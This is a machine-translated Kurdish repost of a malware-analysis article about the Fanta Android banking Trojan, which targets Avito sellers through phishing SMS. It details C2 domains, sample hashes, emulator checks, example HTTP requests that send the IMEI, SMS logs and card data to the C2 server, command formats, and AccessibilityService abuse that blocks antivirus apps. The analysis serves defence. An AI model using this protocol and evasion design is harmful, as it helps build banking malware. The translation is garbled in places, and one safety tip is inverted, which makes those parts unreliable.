ProHoster > Blog > nûçeyên înternetê > Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android

Rojek hûn dixwazin li Avito tiştek bifroşin û, piştî ku hûn ravekek berfireh a hilbera xwe (mînakek modulek RAM) bişînin, hûn ê vê peyamê bistînin:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a AndroidGava ku hûn zencîreyê vekin, hûn ê rûpelek wusa bêguneh bibînin ku we, firoşkarê dilxweş û serfiraz, agahdar dike ku kirînek hatî çêkirin:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
Carekê hûn bişkoja "Bidomîne" bikirtînin, pelek APK bi îkonek û navek pêbawer dê li cîhaza weya Android-ê were dakêşandin. We serîlêdanek saz kir ku ji ber hin sedeman mafên AccessibilityService xwestibû, dûv re çend pencer xuya bûn û zû winda bûn û ... Ew e.

Hûn diçin balansa xwe kontrol bikin, lê ji ber hin sedeman sepana weya bankingê dîsa hûrguliyên qerta we dipirse. Piştî têketina daneyan, tiştek tirsnak diqewime: ji ber hin sedeman ku ji we re hîn ne diyar e, drav ji hesabê we dest pê dike. Hûn hewl didin ku pirsgirêkê çareser bikin, lê têlefona we li ber xwe dide: ew bişkojkên "Veger" û "Home" pêl dike, naqede û nahêle hûn tedbîrên ewlehiyê çalak bikin. Di encamê de hûn bê pere dimînin, tiştên we nehatine kirîn, hûn tevlihev dibin û dipirsin: çi bûye?

Bersiv hêsan e: hûn bûne qurbana Fanta Android Trojan, endamê malbata Flexnet. Ev çawa çêbû? Ka em niha rave bikin.

Nivîskar: Andrey Polovinkin, pisporê piçûk di analîza malware de, Ivan Pisarev, pisporê analîzkirina malware.

Hin hêjmaran

Malbata Flexnet ya Trojanên Android-ê yekem car di sala 2015-an de hate nas kirin. Di serdemek çalakiyek pir dirêj de, malbat li çend cûrbecûr belav bû: Fanta, Limebot, Lipton, hwd. Trojan, û her weha binesaziya ku pê re têkildar e, raweste: pîlanên belavkirinê yên nû yên bi bandor têne pêşve xistin - di rewşa me de, rûpelên fîşa-kalîteya bilind ên ku armanc dikin bikarhênerek-froşkarek taybetî ne, û pêşdebirên Trojan meylên modê dişopînin. nivîsandina vîrusê - lê zêdekirina fonksiyonên nû ku gengaz dike ku meriv bi bandortir drav ji cîhazên vegirtî dizîn û mekanîzmayên parastinê derbas bikin.

Kampanyaya ku di vê gotarê de hatî destnîşan kirin bikarhênerên ji Rûsyayê têne armanc kirin; hejmarek piçûk a cîhazên vegirtî li Ukrayna, û hêj kêmtir li Kazakîstan û Belarusê hatine tomar kirin.

Her çend Flexnet zêdetirî 4 sal in di qada Trojan a Android-ê de ye û ji hêla gelek lêkolîneran ve bi hûrgulî hatî lêkolîn kirin jî, ew hîn jî di rewşek baş de ye. Ji Çileyê 2019-an pê ve, potansiyela zirarê ji 35 mîlyon rubleyan zêdetir e - û ev tenê ji bo kampanyayên li Rûsyayê ye. Di sala 2015-an de, guhertoyên cihêreng ên vê Trojanê ya Android-ê li ser forumên jêrzemînê hatin firotin, ku koda çavkaniyê ya Trojan bi ravekek berfireh jî tê dîtin. Ev tê wê wateyê ku îstatîstîkên zirarên li cîhanê hîn bi bandortir in. Ji bo kalekî weha ne nîşanek xirab e, ne wusa?

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android

Ji firotanê heya xapandinê

Wekî ku ji dîmena ku berê hatî pêşkêş kirin a rûpelek phishing ji bo karûbarê Internetnternetê ji bo şandina reklamên Avito tê dîtin, ew ji bo qurbaniyek taybetî hatî amadekirin. Xuya ye, êrîşkar yek ji parserên Avito bikar tînin, ku jimareya têlefonê û navê firoşker, û her weha danasîna hilberê derdixe. Piştî berfirehkirina rûpel û amadekirina pelê APK, ji qurbanî re SMSek bi navê wî û lînka rûpelek phishing tê şandin ku tê de danasîna hilbera wî û mîqdara ku ji "firotana" hilberê hatî wergirtin heye. Bi tikandina li ser bişkojkê, bikarhêner pelek APK-a xerab - Fanta distîne.

Lêkolînek li ser domaina shcet491[.]ru destnîşan kir ku ew ji serverên DNS yên Hostinger re hatî şandin:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Dosyaya qada domainê navnîşên IP-yê 31.220.23[.]236, 31.220.23[.]243, û 31.220.23[.]235 nîşan dide hene. Lêbelê, tomara çavkaniya bingehîn a domainê (A tomar) serverek bi navnîşana IP-ya 178.132.1[.]240 nîşan dide.

IP navnîşana 178.132.1[.]240 li Hollanda ye û ji mêvandarê re ye WorldStream. Navnîşanên IP-yê 31.220.23[.]235, 31.220.23[.]236 û 31.220.23[.]243 li Keyaniya Yekbûyî ne û girêdayî servera mêvandariya hevpar HOSTINGER. Wek tomarker tê bikaranîn openprov-ru. Domên jêrîn jî bi navnîşana IP-yê 178.132.1[.]240 çareser kirin:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Divê were zanîn ku girêdanên di forma jêrîn de hema hema ji hemî domanan peyda bûn:

http://(www.){0,1}<%domain%>/[0-9]{7}

Di vê şablonê de lînkek ji peyamek SMS-ê jî heye. Li ser bingeha daneyên dîrokî, hate dîtin ku yek domain bi çend girêdanên di şêwaza ku li jor hatî destnîşan kirin re têkildar e, ku destnîşan dike ku yek domain ji bo belavkirina Trojan li çend mexdûran hatî bikar anîn.

Ka em hinekî pêşde biçin: Trojan ku bi girêdanek ji SMS ve hatî dakêşandin navnîşan wekî serverek kontrolê bikar tîne onusedseddohap[.]klûb. Ev domain di 2019-03-12-ê de hatî tomar kirin, û ji 2019-04-29-an pê ve, sepanên APK bi vê domainê re têkilî danî. Li ser bingeha daneyên ku ji VirusTotal hatine wergirtin, bi tevahî 109 serîlêdan bi vê serverê re têkilî dan. Domain bixwe navnîşana IP-yê çareser kir 217.23.14 [.]27, li Holandayê ye û xwediyê mêvandar e WorldStream. Wek tomarker tê bikaranîn namecheap. Domain jî ji vê navnîşana IP-ê re çareser kirin bad-racoon[.]club (ji 2018-09-25 dest pê dike) û bad-racoon[.]bijî (ji 2018-10-25 dest pê dike). Bi domain bad-racoon[.]club zêdetirî 80 pelên APK-ê pê re têkilî dan bad-racoon[.]bijî - zêdeyî 100.

Bi giştî, êrîş bi vî rengî pêşve diçe:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android

Di bin qapaxa Fanta de çi heye?

Mîna gelek Trojanên Android-ê yên din, Fanta jî dikare peyamên SMS-ê bixwîne û bişîne, daxwazên USSD-ê bike, û pencereyên xwe li ser serîlêdanan (tevî yên bankingê jî) nîşan bide. Lêbelê, arsenala fonksiyonê ya vê malbatê gihîştiye: Fanta dest bi karanîna kir AccessibilityService ji bo mebestên cihêreng: xwendina naveroka agahdariyên ji serîlêdanên din, pêşîlêgirtina tespîtkirin û rawestandina darvekirina Trojanek li ser cîhazek vegirtî, hwd. Fanta li ser hemî guhertoyên Android-ê ku ji 4.4-ê piçûktir ne kar dike. Di vê gotarê de em ê hûrgulî li nimûneya Fanta ya jêrîn binêrin:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Yekser piştî destpêkirinê

Yekser piştî destpêkirinê, Trojan îkona xwe vedişêre. Serlêdan tenê dikare bixebite heke navê cîhaza vegirtî di navnîşê de nebe:

  • android_x86
  • VirtualBox
  • Nexus 5X
  • Nexus 5 (razor)

Ev kontrol di xizmeta sereke ya Trojan de tête kirin - MainService. Dema ku ji bo yekem car tê destpêkirin, pîvanên vesazkirinê yên serîlêdanê li gorî nirxên xwerû têne destpêkirin (format ji bo hilanîna daneyên mîhengê û wateya wan dê paşê were nîqaş kirin), û amûrek vegirtî ya nû li ser servera kontrolê tê tomar kirin. Daxwazek HTTP POST bi celebê peyamê dê ji serverê re were şandin register_bot û agahdariya li ser cîhaza vegirtî (guhertoya Android, IMEI, hejmara têlefonê, navê operator û koda welatê ku operator tê de qeydkirî ye). Navnîşan wekî servera kontrolê kar dike hXXp://onuseseddohap[.]club/controller.php. Di bersivê de, server peyamek ku tê de qadan dişîne bot_id, bot_pwd, server - serîlêdan van nirxan wekî pîvanên servera CnC hilîne. Parametre server vebijarkî heke zevî nehatibe wergirtin: Fanta navnîşana qeydkirinê bikar tîne - hXXp://onuseseddohap[.]club/controller.php. Fonksiyona guheztina navnîşana CnC dikare ji bo çareserkirina du pirsgirêkan were bikar anîn: belavkirina barkirinê di navbera çend serveran de (bi hejmareke mezin a cîhazên vegirtî, barkirina li ser serverek webê ya neoptimîzekirî dikare zêde be), û her weha karanîna alternatîfek server di bûyera têkçûna yek ji serverên CnC de.

Ger di şandina daxwazê ​​de xeletiyek çêbibe, Trojan dê piştî 20 çirkeyan pêvajoya qeydkirinê dubare bike.

Piştî ku cîhaz bi serfirazî hate tomar kirin, Fanta dê peyama jêrîn ji bikarhênerê re nîşan bide:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
Nîşe girîng: karûbarê gazî Sîstema Ewlekariyê - navê karûbarê Trojan, û piştî tikandina bişkojkê OK Dê pencereyek bi mîhengên Gihîştinê ya cîhaza vegirtî vebe, ku bikarhêner divê mafên Gihîştinê ji bo karûbarê xirab bide:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
Hema ku bikarhêner vedibe AccessibilityService, Fanta bigihîje naveroka paceyên serîlêdanê û kiryarên ku di wan de têne kirin:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
Yekser piştî wergirtina mafên Gihîştinê, Trojan ji bo xwendina agahdariyan maf û mafên rêveberê daxwaz dike:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
Bi karanîna AccessibilityService, serîlêdan lêdana bişkojan simule dike, bi vî rengî hemî mafên pêwîst dide xwe.

Fanta ji bo hilanîna daneyên mîhengê, û her weha agahdariya ku di pêvajoyê de di derheqê cîhaza vegirtî de hatî berhev kirin, gelek mînakên databasê (yên ku dê paşê bêne diyar kirin) diafirîne. Ji bo şandina agahdariya berhevkirî, Trojan peywirek dubare diafirîne ku ji bo daxistina zeviyan ji databasê hatî çêkirin û fermanek ji servera kontrolê werdigire. Navbera gihîştina CnC-ê li gorî guhertoya Android-ê ve girêdayî ye: Di doza 5.1-ê de, navber dê 10 çirk be, wekî din 60 çirke.

Ji bo wergirtina fermanê, Fanta daxwazek dike GetTask ji bo servera rêveberiyê. Di bersivê de, CnC dikare yek ji fermanên jêrîn bişîne:

tîma description
0 Peyama SMS bişînin
1 Têlefonek an fermanek USSD bikin
2 Parametreyekê nûve dike navber
3 Parametreyekê nûve dike bikişînin
6 Parametreyekê nûve dike smsManager
9 Dest bi berhevkirina peyamên SMS bikin
11 Têlefona xwe li mîhengên kargehê vegerîne
12 Têketina çêkirina qutiya diyalogê çalak bike/neçalak bike

Fanta di heman demê de ji 70 sepanên bankingê, pergalên dravdana bilez û e-walletan agahdariyan berhev dike û wan di databasekê de hilîne.

Parametreyên veavakirinê hilîne

Ji bo hilanîna pîvanên mîhengê, Fanta ji bo platforma Android-ê nêzîkatiyek standard bikar tîne - Hemû gotar-pelên. Mîheng dê di pelek bi navê de bêne tomar kirin settings. Danasînek pîvanên tomarkirî di tabloya jêrîn de ye.

nav Nirxa standard Nirxên gengaz description
id 0 Integer Nasnameya botê
server hXXp://onuseseddohap[.]club/ URL Navnîşana serverê kontrol bikin
pwd - Ben Şîfreya serverê
navber 20 Integer Navbera demê. Nîşan dide ka karên jêrîn divê çiqas dem werin paşxistin:

  • Dema ku daxwazek li ser rewşa peyamek SMS-ê şandin
  • Ji servera rêveberiyê fermanek nû werdigire
bikişînin gişt gişt/hejmar Heger zevî bi rêzê wekhev be gişt an telNumber, wê hingê peyama SMS-ya hatî wergirtin dê ji hêla serîlêdanê ve were girtin û ji bikarhêner re neyê xuyang kirin
smsManager 0 0/1 Serlêdanê wekî wergirê SMS-ya xwerû çalak bike/neçalak bike
readDialog şaş Rast xelet Têketina bûyerê çalak/neçalak bike AccessibilityEvent

Fanta jî pelê bikar tîne smsManager:

nav Nirxa standard Nirxên gengaz description
pckg - Ben Navê rêveberê peyama SMS-ê hatî bikar anîn

Têkiliya bi databases

Di dema xebata xwe de, Trojan du databasan bikar tîne. Database bi navê a ji bo hilanîna agahdariya cihêreng ku ji têlefonê hatî berhev kirin tê bikar anîn. Databasa duyemîn bi navê fanta.db û ji bo hilanîna mîhengên berpirsiyar ên afirandina pencereyên phishing ku ji bo berhevkirina agahdariya li ser qertên bankê hatine çêkirin têne bikar anîn.

Trojan databasê bikar tîne а da ku agahdariya berhevkirî hilînin û kiryarên xwe tomar bikin. Daneyên di tabloyê de têne tomar kirin têketin. Ji bo afirandina tabloyek, pirsa SQL ya jêrîn bikar bînin:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Di databasê de agahdariya jêrîn heye:

1. Têketin destpêkirina cîhaza vegirtî bi peyamek Telefon vebû!

2. Agahiyên ji sepanan. Peyam li gorî şablonê jêrîn tête çêkirin:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Daneyên qerta bankê ji formên phishing ku ji hêla Trojan ve hatî afirandin. Parametre VIEW_NAME dibe ku yek ji van jêrîn be:

  • AliExpress
  • Avito
  • Google play
  • Gelekî <% Navê Serlêdanê%>

Peyam di formatê de tê qeyd kirin:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Peyamên SMS yên hatinî/derketî di forma:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Agahdariya li ser pakêta ku qutiya diyalogê di formatê de diafirîne:

(<%Package name%>)<%Package information%>

Tabloya nimûne têketin:

Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
Yek ji fonksiyonên Fanta berhevkirina agahdariya li ser kartên bankê ye. Komkirina daneyan di dema vekirina serîlêdanên bankingê de bi afirandina pencereyên phishing pêk tê. Trojan tenê carekê pencereya phishing diafirîne. Agahdariya ku pencereyê ji bikarhênerê re hate xuyang kirin di tabloyek de têne hilanîn settings di danegehê de fanta.db. Ji bo afirandina databasek, lêpirsîna SQL ya jêrîn bikar bînin:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Hemû qadên sifrê settings ji hêla xwerû ve ji 1-ê hatî destpêkirin (pencereyek phishing biafirîne). Piştî ku bikarhêner daneyên xwe têkeve, nirx dê bibe 0. Mînaka qadên tabloyê settings:

  • can_login - zevî berpirsiyar e ku formê dema vekirina serîlêdana bankê nîşan bide
  • first_bank - nayê bikaranîn
  • can_avito - dema vekirina serîlêdana Avito zevî berpirsiyar e ku formê nîşan bide
  • can_ali - zevî berpirsiyar e ku formê dema vekirina serîlêdana Aliexpress nîşan bide
  • can_ din - dema ku serîlêdanek ji navnîşê vedike, zevî berpirsiyar e ku formê nîşan bide: Yula, Pandao, Drom Auto, Wallet. Tenzîlat û kartên bonus, Aviasales, Booking, Trivago
  • can_card - zevî ji bo vekirina formê berpirsiyar e Google play

Têkiliya bi servera rêveberiyê re

Têkiliya torê ya bi servera rêveberiyê re bi protokola HTTP pêk tê. Ji bo ku bi torê re bixebite, Fanta pirtûkxaneya populer a Retrofit bikar tîne. Serlêdan têne şandin: hXXp://onuseseddohap[.]club/controller.php. Navnîşana serverê dema ku li ser serverê qeyd dike dikare were guheztin. Dibe ku cookies di bersivê de ji serverê re bêne şandin. Fanta daxwazên jêrîn ji serverê re dike:

  • Qeydkirina botê li ser servera kontrolê yek carek pêk tê, piştî destpêkirina yekem. Daneyên jêrîn li ser cîhaza vegirtî ji serverê re têne şandin:
    · Cookie - çerezên ku ji serverê hatine wergirtin (nirxa xwerû rêzek vala ye)
    · awa - string berdewam register_bot
    · pêşkîte - jimareke domdar 2
    · version_sdk - li gorî şablonê jêrîn pêk tê: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI ya cîhaza vegirtî
    · welat - koda welatê ku operator tê de qeydkirî ye, bi formata ISO
    · jimare - jimare telefon
    · makînevan - navê operator

    Mînakek daxwazek ku ji serverê re hatî şandin:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Di bersiva daxwazê ​​de, server pêdivî ye ku tiştek JSON ku pîvanên jêrîn vedigire vegerîne:
    · bot_id - Nasnameya cîhaza vegirtî. Ger bot_id bi 0 re wekhev be, Fanta dê daxwazê ​​ji nû ve bike.
    bot_pwd - şîfreya serverê.
    server - navnîşana serverê kontrol bikin. Parametreya Bijarî. Ger parametre neyê diyar kirin, navnîşana ku di serîlêdanê de hatî tomarkirin dê were bikar anîn.

    Nimûne JSON object:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Daxwaza wergirtina fermanek ji serverê. Daneyên jêrîn ji serverê re têne şandin:
    · Cookie - çerezên ku ji serverê hatine wergirtin
    · pêşnîyar - Nasnameya cîhaza vegirtî ya ku dema şandina daxwazê ​​hatî wergirtin register_bot
    · pwd - şîfreya serverê
    · divice_admin - qad diyar dike ka mafên rêveberiyê hatine bidestxistin an na. Ger mafên rêveberiyê hatine bidestxistin, zevî wekhev e 1, wekî din 0
    · Gihîştin - Rewşa xebata karûbarê gihîştinê. Ger karûbar dest pê kir, nirx e 1, wekî din 0
    · SMSManager - nîşan dide ka Trojan wekî serîlêdana xwerû ya wergirtina SMS-ê çalak e
    · rûber - nîşan dide ku dîmen di çi rewşê de ye. Nirx dê were danîn 1, heke ekran li ser e, wekî din 0;

    Mînakek daxwazek ku ji serverê re hatî şandin:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Bi fermanê ve girêdayî, server dikare bi pîvanên cihêreng tiştek JSON vegerîne:

    · tîma Peyama SMS bişînin: Parametreyên jimareya telefonê, nivîsa peyama SMS û nasnameya peyama ku tê şandin hene. Nasname dema ku peyamek bi tîpê ji serverê re dişîne tê bikar anîn setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · tîma Têlefonek an fermanek USSD bikin: Hejmara têlefonê an jî ferman di laşê bersivdayînê de tê. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · tîma Parametreya navberê biguherînin. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · tîma Parametreya navberê biguherînin. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · tîma Qada SmsManager biguherînin. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · tîma Ji amûrek vegirtî peyamên SMS berhev bikin.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · tîma Têlefona xwe li mîhengên kargehê vegerîne: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · tîma Parametreya ReadDialog biguherînin. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Şandina peyamek bi tîp setSmsStatus. Ev daxwaz piştî fermanê tê kirin Peyama SMS bişînin. Daxwaz wiha xuya dike:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Barkirina naveroka databasê. Li ser daxwazek yek rêzek tê şandin. Daneyên jêrîn ji serverê re têne şandin:
    · Cookie - çerezên ku ji serverê hatine wergirtin
    · awa - string berdewam setSaveInboxSms
    · pêşnîyar - Nasnameya cîhaza vegirtî ya ku dema şandina daxwazê ​​hatî wergirtin register_bot
    · nivîstok - Nivîsar di tomara databasa heyî de (qada d ji sifrê têketin di danegehê de а)
    · jimare - navê tomara databasa heyî (qada p ji sifrê têketin di danegehê de а)
    · sms_mode - nirxa yekjimar (qad m ji sifrê têketin di danegehê de а)

    Daxwaz wiha xuya dike:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Ger bi serfirazî ji serverê re were şandin, rêz dê ji tabloyê were jêbirin. Nimûne tiştek JSON ku ji hêla serverê ve hatî vegerandin:

    {
    "response":[],
    "status":"ok"
}

Têkilî bi AccessibilityService

AccessibilityService hate bicîh kirin ku amûrên Android-ê ji bo kesên astengdar hêsantir bikar bînin. Di pir rewşan de, pêwendiya laşî hewce ye ku bi serîlêdanê re têkilî daynin. AccessibilityService dihêle hûn wan bi bernameyî bikin. Fanta karûbarê bikar tîne da ku di serîlêdanên bankingê de pencereyên sexte biafirîne û rê li ber bikarhêneran bigire ku mîhengên pergalê û hin serlêdanan vekin.

Bi karanîna fonksiyona AccessibilityService, Trojan guheztinên hêmanên li ser ekrana cîhaza vegirtî dişopîne. Wekî ku berê hate behs kirin, mîhengên Fanta parameterek ku berpirsiyarê operasyonên têketinê bi qutiyên diyalogê ve girêdayî ye - readDialog. Ger ev parametre were danîn, dê agahdariya li ser nav û danasîna pakêta ku bûyer daye destpêkirin li databasê were zêdekirin. Dema ku bûyer têne destpêkirin Trojan kiryarên jêrîn pêk tîne:

  • Zêdekirina bişkojkên paş û malê di rewşên jêrîn de simul dike:
    · ger bikarhêner bixwaze amûrê xwe ji nû ve saz bike
    · heke bikarhêner bixwaze serîlêdana "Avito" jê bibe an mafên gihîştinê biguhezîne
    · heke li ser rûpelê behsa serîlêdana "Avito" hebe
    · dema vekirina serîlêdana Google Play Protect
    · dema vekirina rûpelan bi mîhengên AccessibilityService
    · dema ku qutiya diyalogê ya Ewlekariya Sîstemê xuya dibe
    · dema vekirina rûpel bi mîhengên "Draw ser app din".
    · dema vekirina rûpela "Serlêdan", "Paqijkirin û vesazkirin", "Vesazkirina daneyan", "Mîhengên vegerandin", "Panela Pêşdebir", "Taybetî. îmkan”, “Derfetên taybet”, “Mafên taybet”
    · heke bûyer ji hêla hin serlêdanan ve hatî çêkirin.

    Lîsteya serîlêdanan

    • android
    • Master Lite
    • Masterê paqij
    • Paqij Master ji bo x86 CPU
    • Rêvebiriya Destûra Serlêdana Meizu
    • Ewlekariya MIUI
    • Master Paqij - Antivirus & Cache and Garbage Cleaner
    • Kontrolên dêûbav û GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Ewlekariya Beta
    • Paqijkerê Vîrus, Antivirus, Paqijker (Ewlehiya MAX)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & parastina belaş 2019
    • Ewlekariya Mobîl MegaFon
    • Parastina AVG ji bo Xperia
    • Ewlekariya Mobile
    • Malwarebytes antivirus & parastina
    • Antivirus ji bo Android 2019
    • Master Ewlekariyê - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG ji bo Rêvebirê Pergala tabletê Huawei
    • Gihîştina Samsung
    • Rêveberê Smart Samsung
    • Master Ewlekariyê
    • Booster bilez
    • dr.web
    • Dr.Web Space Security
    • Navenda Kontrola Mobîl Dr.Web
    • Dr.Web Ewlekariya Space Life
    • Navenda Kontrola Mobîl Dr.Web
    • Antivirus & Ewlekariya Mobîl
    • Ewlekariya Înternetê ya Kaspersky: Antivirus û Parastin
    • Jiyana Battery Kaspersky: Saver & Booster
    • Ewlekariya Endpoint Kaspersky - parastin û rêvebirin
    • AVG Antivirus belaş 2019 - Parastin ji bo Android
    • Android Antivirus
    • Ewlekariya Norton Mobile û Antivirus
    • Antivirus, firewall, VPN, ewlehiya mobîl
    • Ewlekariya Mobîl: antivirus, VPN, parastina diziyê
    • Antivirus ji bo Android

  • Ger destûr were xwestin dema ku peyamek SMS ji hejmareke kurt re dişîne, Fanta klîkkirina li ser qutiya kontrolê simule dike. Hilbijartinê bîr bînin û bişkojk şandin.
  • Dema ku hûn hewl didin ku mafên rêveberê ji Trojanê bistînin, ew ekrana têlefonê kilît dike.
  • Pêşî lê zêdekirina rêveberên nû digire.
  • Ger serîlêdana antivirus dr.web metirsiyek dît, Fanta bi tikandina bişkojê teqlîd dike berçavnegirtin.
  • Heke bûyer ji hêla serîlêdanê ve hatî çêkirin, Trojan tikandina bişkoka paş û malê simul dike Lênêrîna Amûra Samsung.
  • Heke serîlêdanek ji navnîşek ku nêzîkê 30 karûbarên Înternetê yên cihêreng vedihewîne were destpêkirin, Fanta bi formên ketina agahdariya li ser qertên bankê pencereyên phishing diafirîne. Di nav wan de: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, hwd.

    Formên Phishing

    Fanta analîz dike ka kîjan serîlêdan li ser cîhaza vegirtî têne xebitandin. Ger serîlêdanek balkêş hate vekirin, Trojan pencereyek phishing li ser hemî yên din nîşan dide, ku ew formek e ji bo têketina agahdariya qerta bankê. Divê bikarhêner daneyên jêrîn binivîse:

    • Kartên nû
    • Dîroka qedandina kartê
    • CVV
    • Navê xwediyê kartê (ne ji bo hemî bankan)

    Bi serîlêdana xebitandinê ve girêdayî, pencereyên cûda yên phishing dê bêne xuyang kirin. Li jêr mînakên hin ji wan hene:

    Aliexpress:

    Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
    Avito:

    Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android
    Ji bo hin sepanên din, wek mînak. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: taktîkek nû ji bo Trojanek kevn a Android

    Bi rastî çawa bû

    Xweşbextane, kesê ku peyama SMS-ya ku di destpêka gotarê de hatî destnîşan kirin wergirtiye derket holê ku pisporek ewlehiya sîber e. Ji ber vê yekê, guhertoya rastîn, ne-derhêner ji ya ku berê hatibû gotin cûda ye: kesek SMSek balkêş wergirt, pişt re ew da tîmê îstîxbarata nêçîrê ya xeternak Group-IB. Encama êrîşê ev gotar e. Dawiya xweş, rast? Lêbelê, ne hemî çîrok ew qas bi serfirazî bi dawî dibin, û ji bo ku ya we wekî qutkirina derhênerek bi windakirina drav xuya neke, di pir rewşan de bes e ku meriv rêzikên jêrîn ên dirêj-navkirî bişopînin:

    • ji bo cîhaza mobîl a bi OS-ya Android-ê ji çavkaniyên din ji bilî Google Play-ê serîlêdanên saz nekin
    • Dema ku serîlêdanek saz dikin, bala taybetî bidin mafên ku ji hêla serîlêdanê ve têne xwestin
    • bala xwe bidin dirêjkirina pelên dakêşandî
    • nûvekirinên Android OS-ê bi rêkûpêk saz bikin
    • serdana çavkaniyên gumanbar nekin û pelan ji wir dakêşînin
    • Li ser lînkên ku di peyamên SMS de hatine wergirtin bikirtînin.

Source: www.habr.com

Add a comment